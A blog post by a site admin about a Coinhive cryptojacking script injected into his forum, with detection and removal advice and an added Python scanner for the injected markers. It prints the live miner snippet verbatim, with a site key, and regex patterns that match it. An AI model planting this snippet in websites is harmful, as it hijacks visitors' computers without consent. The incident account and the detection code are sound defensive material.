What to do if Coinhive crypto-mining script infects your website
I have been reading about website owners using scripts on their websites that use the CPU of the visitor’s computer when they visit their website. The idea is to monetize their content – and so instead of using ads, they use a script that runs in the browser and uses the user’s computer resources to mine cryptocurrency. But I used to think that only website owners did this by design – I never imagined that hackers would hack websites and push the script on to other websites and use their visitors’ CPU to make money for themselves. But this is what seems to be happening now!
Coinhive crypto-mining script
Yesterday when I visited our TWC Forum, which runs on vBulletin software, my security software threw up this warning:
https:// coinhive dot com /lib/coinhive.js Object file detected, download blocked
I usually visit the forum every day and I hadn’t seen it the day before. So I assume that this had happened some time during the night, my time, when I was sleeping.
I use vBulletin software for the forum, and it was updated to the latest version. Moreover, this was quite surprising for us, as TheWindowsClub.com domain uses Sucuri Web Antivirus & Firewall to protect itself from online web threats & attacks.
My PC security software successfully stopped the malicious script from running on my Windows 10 computer. I checked with other browsers like Chrome & Edge, and the results were the same.
After right-clicking on the forum web page and checking the source code, I found that it was a CryptoMiner malicious script of CoinHive.
<script src="https:// coinhive dot com /lib/coinhive.min.js"></script><script>var miner =new CoinHive.Anonymous("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm");miner.start();</script>
Anyway, the first thing I did was to take the forum down and inform Sucuri.
The Sucuri folks cleaned the forum of the Coinhive script which had got pushed into my forum in a few hours, and all was fine.
What is CoinHive
This is called Cryptojacking. It involves hijacking the users’ browsers for cryptocurrency mining. Some website owners may use it themselves to make money – but in our case, it had got injected.
Now if your browser is infected you will see your resource utilization go up. Close the browser, and it will drop. The user may notice his machine heating up, the fan running fast or the battery draining fast.
I asked my colleague Saurabh Mukhekar to visit my forum using his Mac and see what happened. Well, his Mac computer was affected too when he opened the forum with Safari! He is one of those smart Mac OSX users who use antivirus software on their Mac. His Avast antivirus for Mac successfully stopped the malicious script from running.
Prevent CoinHive from infecting your website
Don’t use any nulled (pirated) templates or plugins on your website/forum.
Keep your CMS updated to the latest version.
Update your hosting software regularly (PHP, database, etc.).
First of all, you need to be the webmaster of the infected website – or have administrative credentials that give you access to all the website files.
Now when your antivirus detects the CoinHive infection, right-click on the web page and select View Source Code. Next press Ctrl+F and search for “CoinHive”.
Once you have found the malicious code in the page source, note its position in the page so that you can trace it to the file that contains it. You then need to remove it manually, which takes a bit of coding knowledge of your platform: locate the infected file(s) and delete the above script from them. If you are not sure how to do this, ask an expert to do it. Since we use Sucuri, we let them do it.
Having done that, clear your server & browser cache. If you are using any cache plugin or say MaxCDN, clear those caches too.
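The "locate the infected file/s" step can be done on the server itself rather than through the browser. The following is an added example, not part of the original post or of Sucuri's tooling: a Python scan of a web root for the two markers in the snippet shown earlier (the coinhive.js include and the CoinHive miner call), reporting file, line and the site key passed to the miner. The file extensions, function names and sample files are assumptions made for the illustration.

```python
import os
import re
import tempfile

# Both patterns come from the injected snippet shown in this post.
LOADER_RE = re.compile(r"coinhive\.com/lib/coinhive(?:\.min)?\.js", re.I)
MINER_RE = re.compile(r"CoinHive\.\w+\(\s*[\"']([^\"']+)[\"']")
# Assumption: extensions typical of a PHP-based CMS or forum.
SCAN_EXT = {".php", ".html", ".htm", ".js", ".tpl", ".inc"}


def scan_file(path):
    """Return (path, line_no, kind, detail) for every match in one file."""
    hits = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line_no, line in enumerate(fh, 1):
            if LOADER_RE.search(line):
                hits.append((path, line_no, "loader", "coinhive.js include"))
            for match in MINER_RE.finditer(line):
                hits.append((path, line_no, "site_key", match.group(1)))
    return hits


def scan_tree(root):
    """Walk the web root and collect findings from scannable files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if os.path.splitext(name)[1].lower() in SCAN_EXT:
                findings.extend(scan_file(os.path.join(dirpath, name)))
    return findings


def write_constructed_sample(root):
    """Create one clean and one infected file (constructed test data)."""
    with open(os.path.join(root, "clean.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    with open(os.path.join(root, "footer.html"), "w", encoding="utf-8") as fh:
        fh.write('<div id="footer"></div>\n'
                 '<script src="https://coinhive.com/lib/coinhive.min.js">'
                 '</script><script>var miner =new CoinHive.Anonymous('
                 '"CONSTRUCTED-SITE-KEY");miner.start();</script>\n')


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as webroot:
        write_constructed_sample(webroot)
        for path, line_no, kind, detail in scan_tree(webroot):
            print(f"{os.path.relpath(path, webroot)}:{line_no} {kind} {detail}")
```

A clean result only means these literal strings are absent from the scanned files; an injection that is obfuscated or stored outside the file system will not match, so compare against a known-good copy of the site as well.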
Protect yourself against crypto mining scripts
Cryptocurrencies & Blockchain technology are taking over the world. They are having an impact on the global economy and causing technology disruptions as well. Everyone has started focusing on such a lucrative market – and this includes website hackers too. As returns increase, we should expect that such technologies will be misused. That’s the dark side of any emerging technology.
As a matter of abundant precaution, if you ever feel that you may have visited an infected site, it would be a good idea to clear your browser cache and scan your machine with your antivirus software as well as AdwCleaner.
Anand Khanse is the Admin of TheWindowsClub.com, a 10-year Microsoft MVP Awardee in Windows (2006-16) & a Windows Insider MVP since then.